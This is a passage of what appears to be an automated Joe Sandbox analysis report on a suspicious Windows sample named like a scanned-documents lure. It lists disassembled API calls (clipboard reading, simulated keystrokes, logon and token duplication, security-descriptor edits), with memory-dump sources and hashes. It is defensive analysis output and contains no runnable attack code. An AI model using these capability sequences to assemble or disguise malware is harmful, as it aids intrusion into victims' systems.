                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00282DC4
                                                        • Part of subcall function 00286B57: _wcslen.LIBCMT ref: 00286B6A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: LongNamePath_wcslen
                                                      • String ID:
                                                      • API String ID: 541455249-0
                                                      • Opcode ID: 07679ce66d9cf035c6dffd0c7185bb3bc953e5d8dd196dd4176f685758cd8324
                                                      • Instruction ID: dcfa94cb94a5ed1ab53acb80a59425f468956007cf6e979a6d65c4c7c85ce12a
                                                      • Opcode Fuzzy Hash: 07679ce66d9cf035c6dffd0c7185bb3bc953e5d8dd196dd4176f685758cd8324
                                                      • Instruction Fuzzy Hash: 54E0C276A002245BCB21A2989C0AFEA77EDDFC8794F0441B5FD09E7248DA70ED908A90
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock
                                                      • String ID:
                                                      • API String ID: 2638373210-0
                                                      • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                      • Instruction ID: 37ee976929400c80ab9ab7b6279ce48b26104c0f9ce0fbe1532fc684a3e6573a
                                                      • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                      • Instruction Fuzzy Hash: E6E04FB0619B009FDF395E28A8517B6B7E89F4A340F00086EF69BC2252E57268568A4D
                                                      APIs
                                                        • Part of subcall function 00283837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00283908
                                                        • Part of subcall function 0028D730: GetInputState.USER32 ref: 0028D807
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00282B6B
                                                        • Part of subcall function 002830F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0028314E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                      • String ID:
                                                      • API String ID: 3667716007-0
                                                      • Opcode ID: 45c9764fb51a9ee3d433d293a50e4b79aef2ab88d9146d8962151c31cb156e75
                                                      • Instruction ID: 424e19573e8f604d3dc2a758d38fd87ed872eb9d46b1a709c0c5f428b3097115
                                                      • Opcode Fuzzy Hash: 45c9764fb51a9ee3d433d293a50e4b79aef2ab88d9146d8962151c31cb156e75
                                                      • Instruction Fuzzy Hash: EFE0262D32220402CA04FB31A812ABDE35D8BD5716F40253EF042831E3CE2449A94B12
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,002C0704,?,?,00000000,?,002C0704,00000000,0000000C), ref: 002C03B7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 5e18652bb8c3d536f105316e63f60be4bd5ba188f603bd8ed8183f1291084122
                                                      • Instruction ID: ac0f6760ab9910e1d78bb7055db12d79be4512a32ff939616572abe79b46d3e5
                                                      • Opcode Fuzzy Hash: 5e18652bb8c3d536f105316e63f60be4bd5ba188f603bd8ed8183f1291084122
                                                      • Instruction Fuzzy Hash: CBD06C3209010DBBDF028F84DD06EDA3BAAFB4C714F018010BE1856020C732E821AB90
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00281CBC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: InfoParametersSystem
                                                      • String ID:
                                                      • API String ID: 3098949447-0
                                                      • Opcode ID: b2e342dcdca1c93d92ec512474b8e9857c2ca4ed8b0d218f8c0e2b0cb66f0213
                                                      • Instruction ID: a4d922c7cca78bc7add6c34f92639aa56b5c94d6be59202a4fff0d398e5bbd13
                                                      • Opcode Fuzzy Hash: b2e342dcdca1c93d92ec512474b8e9857c2ca4ed8b0d218f8c0e2b0cb66f0213
                                                      • Instruction Fuzzy Hash: AAC0923A2C0304AFF2178B81FC5AF51B76DA34EB02F048801F609A95F3D3A22820EA50
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction ID: b2b05809ac3cd7e0dec0de59d0201052a26cc31055d44f98e326e932954a2149
                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction Fuzzy Hash: 6B310675A2010ADBCB98CF59D680969F7A1FF49300B24C6A6E809CF655D731EDE1CBD0
                                                      APIs
                                                      • Sleep.KERNELBASE(000001F4), ref: 032022B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1659326696.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3200000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction ID: 3b81334659b706db1dc1e854afaf973d87fe7c9d930a11c98604c33063d08427
                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction Fuzzy Hash: 6CE0BF7594020EDFDB00EFA8D94969E7BB4EF04301F1005A1FD0592281D63099508A62
                                                      APIs
                                                        • Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2
                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0031961A
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0031965B
                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0031969F
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003196C9
                                                      • SendMessageW.USER32 ref: 003196F2
                                                      • GetKeyState.USER32(00000011), ref: 0031978B
                                                      • GetKeyState.USER32(00000009), ref: 00319798
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003197AE
                                                      • GetKeyState.USER32(00000010), ref: 003197B8
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003197E9
                                                      • SendMessageW.USER32 ref: 00319810
                                                      • SendMessageW.USER32(?,00001030,?,00317E95), ref: 00319918
                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0031992E
                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00319941
                                                      • SetCapture.USER32(?), ref: 0031994A
                                                      • ClientToScreen.USER32(?,?), ref: 003199AF
                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003199BC
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003199D6
                                                      • ReleaseCapture.USER32 ref: 003199E1
                                                      • GetCursorPos.USER32(?), ref: 00319A19
                                                      • ScreenToClient.USER32(?,?), ref: 00319A26
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00319A80
                                                      • SendMessageW.USER32 ref: 00319AAE
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00319AEB
                                                      • SendMessageW.USER32 ref: 00319B1A
                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00319B3B
                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00319B4A
                                                      • GetCursorPos.USER32(?), ref: 00319B68
                                                      • ScreenToClient.USER32(?,?), ref: 00319B75
                                                      • GetParent.USER32(?), ref: 00319B93
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00319BFA
                                                      • SendMessageW.USER32 ref: 00319C2B
                                                      • ClientToScreen.USER32(?,?), ref: 00319C84
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00319CB4
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00319CDE
                                                      • SendMessageW.USER32 ref: 00319D01
                                                      • ClientToScreen.USER32(?,?), ref: 00319D4E
                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00319D82
                                                        • Part of subcall function 00299944: GetWindowLongW.USER32(?,000000EB), ref: 00299952
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00319E05
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                      • String ID: @GUI_DRAGID$F$p#5
                                                      • API String ID: 3429851547-3183100334
                                                      • Opcode ID: 1cd523035163b9048a338ce327aa653a0c857ffa40fa5b0347ac1a887bf30a73
                                                      • Instruction ID: 746b046aabed586b58cf5b0eef5cc78009ba95221406516b5eb412d3511d0724
                                                      • Opcode Fuzzy Hash: 1cd523035163b9048a338ce327aa653a0c857ffa40fa5b0347ac1a887bf30a73
                                                      • Instruction Fuzzy Hash: 83425C74204241AFD72ACF24CC54BEABBE9FF8D320F15461AF599872A1D731A8A4CF51
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 003148F3
                                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00314908
                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00314927
                                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0031494B
                                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0031495C
                                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0031497B
                                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 003149AE
                                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 003149D4
                                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00314A0F
                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00314A56
                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00314A7E
                                                      • IsMenu.USER32(?), ref: 00314A97
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00314AF2
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00314B20
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00314B94
                                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00314BE3
                                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00314C82
                                                      • wsprintfW.USER32 ref: 00314CAE
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00314CC9
                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00314CF1
                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00314D13
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00314D33
                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00314D5A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                      • String ID: %d/%02d/%02d
                                                      • API String ID: 4054740463-328681919
                                                      • Opcode ID: 1904c3ad5b63eb5ef71658004a6b92d18e8c8341d2f84a8673f6095ea857bc91
                                                      • Instruction ID: 93448a8115ac6bdac0b2aa0ce07b9858895d36afdb703825fd28dd6fb3c99372
                                                      • Opcode Fuzzy Hash: 1904c3ad5b63eb5ef71658004a6b92d18e8c8341d2f84a8673f6095ea857bc91
                                                      • Instruction Fuzzy Hash: 9B12F071640214ABEB2A8F28CD49FEEBBF8EF49710F144129F915DB2E1DB749981CB50
                                                      APIs
                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0029F998
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002DF474
                                                      • IsIconic.USER32(00000000), ref: 002DF47D
                                                      • ShowWindow.USER32(00000000,00000009), ref: 002DF48A
                                                      • SetForegroundWindow.USER32(00000000), ref: 002DF494
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002DF4AA
                                                      • GetCurrentThreadId.KERNEL32 ref: 002DF4B1
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002DF4BD
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 002DF4CE
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 002DF4D6
                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 002DF4DE
                                                      • SetForegroundWindow.USER32(00000000), ref: 002DF4E1
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 002DF4F6
                                                      • keybd_event.USER32(00000012,00000000), ref: 002DF501
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 002DF50B
                                                      • keybd_event.USER32(00000012,00000000), ref: 002DF510
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 002DF519
                                                      • keybd_event.USER32(00000012,00000000), ref: 002DF51E
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 002DF528
                                                      • keybd_event.USER32(00000012,00000000), ref: 002DF52D
                                                      • SetForegroundWindow.USER32(00000000), ref: 002DF530
                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 002DF557
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 4125248594-2988720461
                                                      • Opcode ID: fbcc5cecfe14e00a34ef7da674bc1c4fa09b1a7f910e483515913a78c4f2fbea
                                                      • Instruction ID: f89819f9bcb69829e1538d410d08340e13bc1896844a0ddfee1985396a66760b
                                                      • Opcode Fuzzy Hash: fbcc5cecfe14e00a34ef7da674bc1c4fa09b1a7f910e483515913a78c4f2fbea
                                                      • Instruction Fuzzy Hash: 0931A371AA0318BFEB216FB55C4AFFF7E6CEB48B50F105026FA01E61D1C6B05D10AA64
                                                      APIs
                                                        • Part of subcall function 002E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002E170D
                                                        • Part of subcall function 002E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002E173A
                                                        • Part of subcall function 002E16C3: GetLastError.KERNEL32 ref: 002E174A
                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 002E1286
                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 002E12A8
                                                      • CloseHandle.KERNEL32(?), ref: 002E12B9
                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002E12D1
                                                      • GetProcessWindowStation.USER32 ref: 002E12EA
                                                      • SetProcessWindowStation.USER32(00000000), ref: 002E12F4
                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 002E1310
                                                        • Part of subcall function 002E10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002E11FC), ref: 002E10D4
                                                        • Part of subcall function 002E10BF: CloseHandle.KERNEL32(?,?,002E11FC), ref: 002E10E9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                      • String ID: $default$winsta0$Z4
                                                      • API String ID: 22674027-3531531049
                                                      • Opcode ID: 2a2df4500051778c6178d2710d5e2b32c91d75ab1359d34614df88dc1b421bd1
                                                      • Instruction ID: d8bd28a49588843ea83004e222590560d82091cda478d524fa5b16e8ad12e8a8
                                                      • Opcode Fuzzy Hash: 2a2df4500051778c6178d2710d5e2b32c91d75ab1359d34614df88dc1b421bd1
                                                      • Instruction Fuzzy Hash: 9181A2719A0289AFDF119FA5DC49FEE7BBDEF08704F148129F911A62A0D7708964CB20
                                                      APIs
                                                        • Part of subcall function 002E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002E1114
                                                        • Part of subcall function 002E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,002E0B9B,?,?,?), ref: 002E1120
                                                        • Part of subcall function 002E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002E0B9B,?,?,?), ref: 002E112F
                                                        • Part of subcall function 002E10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002E0B9B,?,?,?), ref: 002E1136
                                                        • Part of subcall function 002E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002E114D
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002E0BCC
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002E0C00
                                                      • GetLengthSid.ADVAPI32(?), ref: 002E0C17
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 002E0C51
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002E0C6D
                                                      • GetLengthSid.ADVAPI32(?), ref: 002E0C84
                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 002E0C8C
                                                      • HeapAlloc.KERNEL32(00000000), ref: 002E0C93
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002E0CB4
                                                      • CopySid.ADVAPI32(00000000), ref: 002E0CBB
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002E0CEA
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002E0D0C
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002E0D1E
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002E0D45
                                                      • HeapFree.KERNEL32(00000000), ref: 002E0D4C
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002E0D55
                                                      • HeapFree.KERNEL32(00000000), ref: 002E0D5C
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002E0D65
                                                      • HeapFree.KERNEL32(00000000), ref: 002E0D6C
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 002E0D78
                                                      • HeapFree.KERNEL32(00000000), ref: 002E0D7F
                                                        • Part of subcall function 002E1193: GetProcessHeap.KERNEL32(00000008,002E0BB1,?,00000000,?,002E0BB1,?), ref: 002E11A1
                                                        • Part of subcall function 002E1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,002E0BB1,?), ref: 002E11A8
                                                        • Part of subcall function 002E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,002E0BB1,?), ref: 002E11B7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                      • String ID:
                                                      • API String ID: 4175595110-0
                                                      • Opcode ID: 1341e62a085a9870350e72ba016e9a9f9b649b7d83f7a2f46e56588987fe779f
                                                      • Instruction ID: 82ddb8f452d20fee0ee59ca0a917704e3e068c11ba30ef5831d356e833ef2619
                                                      • Opcode Fuzzy Hash: 1341e62a085a9870350e72ba016e9a9f9b649b7d83f7a2f46e56588987fe779f
                                                      • Instruction Fuzzy Hash: 0571AC7199024AEBDF11DFA5DC84BEEBBBCFF08300F548125E904A6190D7B4A956CB60
                                                      APIs
                                                      • OpenClipboard.USER32(0031CC08), ref: 002FEB29
                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 002FEB37
                                                      • GetClipboardData.USER32(0000000D), ref: 002FEB43
                                                      • CloseClipboard.USER32 ref: 002FEB4F
                                                      • GlobalLock.KERNEL32(00000000), ref: 002FEB87
                                                      • CloseClipboard.USER32 ref: 002FEB91
                                                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 002FEBBC
                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 002FEBC9
                                                      • GetClipboardData.USER32(00000001), ref: 002FEBD1
                                                      • GlobalLock.KERNEL32(00000000), ref: 002FEBE2
                                                      • GlobalUnlock.KERNEL32(00000000,?), ref: 002FEC22
                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 002FEC38
                                                      • GetClipboardData.USER32(0000000F), ref: 002FEC44
                                                      • GlobalLock.KERNEL32(00000000), ref: 002FEC55
                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 002FEC77
                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 002FEC94
                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 002FECD2
                                                      • GlobalUnlock.KERNEL32(00000000,?,?), ref: 002FECF3
                                                      • CountClipboardFormats.USER32 ref: 002FED14
                                                      • CloseClipboard.USER32 ref: 002FED59
                                                      Memory Dump Source
